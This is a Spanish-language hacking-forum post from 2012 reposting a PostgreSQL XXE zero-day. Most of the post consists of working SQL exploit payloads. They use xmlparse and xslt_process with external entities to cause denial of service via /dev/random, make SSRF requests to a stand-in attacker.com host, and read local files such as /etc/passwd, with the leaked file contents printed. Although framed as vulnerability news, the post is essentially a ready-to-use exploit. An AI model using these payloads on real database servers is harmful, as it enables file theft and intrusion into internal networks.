send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

0day: vulnerabilidad XXE en PostgreSQL

  • 0 Respuestas
  • 1549 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« en: Junio 01, 2012, 09:12:24 am »
Un ataque XXE (Xml eXternal Entity) es un tipo de inyección XML con URIs (entidades externas) que se aprovecha de un parser XML mal configurado para ejecutar una funcionalidad que podría comprometer la seguridad de una aplicación web: acceso al sistema de ficheros del servidor, causar una DoS, inyección de javascript (por. ej. para un XSS), etc.

Recientemente ONsec ha publicado en la PHDays un 0-day muy interesante de una vulnerabilidad XXE basada en error que afecta a PostgreSQL y que podría permitir a un atacante leer ficheros locales y hacer peticiones desde el servidor de base datos a la intranet (SSRF - Server Side Request Forgery).

Código: You are not allowed to view links. Register or Login
    Example:
    DoS:
    select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/dev/random">]><content>&abc;</content>')
     
    SSRF:
    select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "http://attacker.com/?xxe=OK">]><content>&abc;</content>')
     
    Error-based XXE:
     
    select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;</content>');
     
        ERROR:  invalid XML document
        DETAILS:  /etc/network/if-up.d/mountnfs:28: parser error : StartTag: invalid element name
        exec 9<&0 </etc/fstab       ^
        /etc/network/if-up.d/mountnfs:28: parser error : xmlParseEntityRef: no name
        exec 9<&0 </etc/fstab        ^
        /etc/network/if-up.d/mountnfs:28: parser error : chunk is not well balanced
        exec 9<&0 </etc/fstab          ^
        Entity: line 1: parser error : Failure to process entity abc
        E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;
                                                                                       ^
        Entity: line 1: parser error : Entity 'abc' not defined
        E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;                                                                               ^
     
    UPDATE!
    Classical XXE from XSLT transformation founded.
    Reading any data are possible also:
     
     
    SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name><age>30</age><pay>400</pay></employee>'::text, $$<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template match="*">  <xsl:element name="samples">    <xsl:element name="sample"><xsl:value-of select="//employee/name/text()"/> </xsl:element>  </xsl:element></xsl:template></xsl:stylesheet>$$::text, 'n1=v1,n2=v2,n3=v3,n4=v4,n5=v5'::text);
     
                                             xslt_process                                     
        -----------------------------------------------------------------------------------------
         <?xml version="1.0"?>
         <samples><sample>root:x:0:0:root:/root:/bin/bash
         daemon:x:1:1:daemon:/usr/sbin:/bin/sh
         bin:x:2:2:bin:/bin:/bin/sh
         sys:x:3:3:sys:/dev:/bin/sh
         sync:x:4:65534:sync:/bin:/bin/sync
         games:x:5:60:games:/usr/games:/bin/sh
         man:x:6:12:man:/var/cache/man:/bin/sh
         lp:x:7:7:lp:/var/spool/lpd:/bin/sh
         mail:x:8:8:mail:/var/mail:/bin/sh
         news:x:9:9:news:/var/spool/news:/bin/sh
         uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
         proxy:x:13:13:proxy:/bin:/bin/sh
         www-data:x:33:33:www-data:/var/www:/bin/sh
         backup:x:34:34:backup:/var/backups:/bin/sh
         list:x:38:38:Mailing List Manager:/var/list:/bin/sh
         irc:x:39:39:ircd:/var/run/ircd:/bin/sh
         gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
         nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
         libuuid:x:100:101::/var/lib/libuuid:/bin/sh
         nslcd:x:101:103:nslcd name service LDAP connection daemon,,,:/var/run/nslcd/:/bin/false
         sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
         puppet:x:109:111:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
         Debian-exim:x:111:115::/var/spool/exim4:/bin/false
         alexandro:x:1000:1000:Alexander Golovko,,,:/home/alexandro:/bin/bash
         oxod:x:1001:1001:,,,:/home/oxod:/bin/bash
         mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false
         postgres:x:104:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
         oracle:x:1002:1002::/u01/app/oracle:/bin/bash
         </sample></samples>
     
        (1 row)

FUENTE: hackplayers
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

 

¿Te gustó el post? COMPARTILO!



Vulnerabilidad en Kali Linux Sana 2.0 CVE-2015-2008 Auditoria Omar Rodriguez

Iniciado por DaRK UnLiMiTeD

Respuestas: 0
Vistas: 2382
Último mensaje Septiembre 28, 2015, 10:37:40 pm
por DaRK UnLiMiTeD
Instalación de BadStore en VirtualBox [Vulnerabilidad virtual para practicar]

Iniciado por Stiuvert

Respuestas: 0
Vistas: 2317
Último mensaje Abril 23, 2012, 05:28:08 pm
por Stiuvert
Dirty COW - CVE-2016-5195 explotando vulnerabilidad en el Kernel de Linux

Iniciado por BrowserNet

Respuestas: 5
Vistas: 2881
Último mensaje Diciembre 26, 2016, 03:44:26 am
por Dr4g0n4Y
Grave Vulnerabilidad en MySQL/MariaDB (Autenticación sin Password)

Iniciado por CalebBucker

Respuestas: 1
Vistas: 2183
Último mensaje Junio 12, 2012, 04:20:50 pm
por ANTRAX
[Tutorial] Vulnerabilidad CSRF By ShadinessDark [Colaboracion de Zero Bits]

Iniciado por dracko.rx

Respuestas: 0
Vistas: 1625
Último mensaje Febrero 24, 2010, 03:24:51 pm
por dracko.rx